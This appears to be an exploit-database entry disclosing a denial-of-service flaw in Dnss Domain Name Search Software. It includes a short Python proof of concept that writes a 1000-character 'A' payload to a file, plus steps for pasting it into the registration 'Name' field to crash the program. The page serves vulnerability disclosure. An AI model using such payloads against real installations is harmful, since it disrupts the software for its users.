Dnss Domain Name Search Software - 'Name' Denial of Service (PoC)

vendor:

Dnss Domain Name Search Software

by:

Ismail Tasdelen

5.5

CVSS

MEDIUM

Denial of Service

DoS

CWE

Product Name: Dnss Domain Name Search Software

Affected Version From:

Affected Version To:

Patch Exists: NO

Related CWE:

CPE: a:nsauditor:dnss

Metasploit:

Other Scripts:

Platforms Tested: Windows 10

2020

Dnss Domain Name Search Software – ‘Name’ Denial of Service (PoC)

The Dnss Domain Name Search Software is prone to a denial-of-service (DoS) vulnerability. This allows remote attackers to crash the application by providing a specially crafted value for the 'Name' field. A proof-of-concept (PoC) exploit is provided in the form of a Python script that creates a file containing a payload of 1000 characters and causes the application to crash when the payload is copied into the 'Name' field.

Mitigation:

The vendor has not released a patch for this vulnerability. To mitigate the risk, users are advised to avoid inputting large amounts of data into the 'Name' field in the Dnss Domain Name Search Software.

Source

Exploit-DB raw data:

# Exploit Title: Dnss Domain Name Search Software - 'Name' Denial of Service (PoC)
# Exploit Author : Ismail Tasdelen
# Exploit Date: 2020-01-06
# Vendor Homepage : http://www.nsauditor.com/
# Link Software : http://www.nsauditor.com/downloads/networksleuth_setup.exe
# Tested on OS: Windows 10
# CVE : N/A

'''
Proof of Concept (PoC):
=======================

1.Download and install Dnss
2.Run the python operating script that will create a file (poc.txt)
3.Run the software "Register -> Enter Registration Code
4.Copy and paste the characters in the file (poc.txt)
5.Paste the characters in the field 'Name' and click on 'Ok'
6.Dnss Crashed
'''

#!/usr/bin/python
    
buffer = "A" * 1000
 
payload = buffer
try:
    f=open("poc.txt","w")
    print("[+] Creating %s bytes evil payload." %len(payload))
    f.write(payload)
    f.close()
    print("[+] File created!")
except:
    print("File cannot be created.")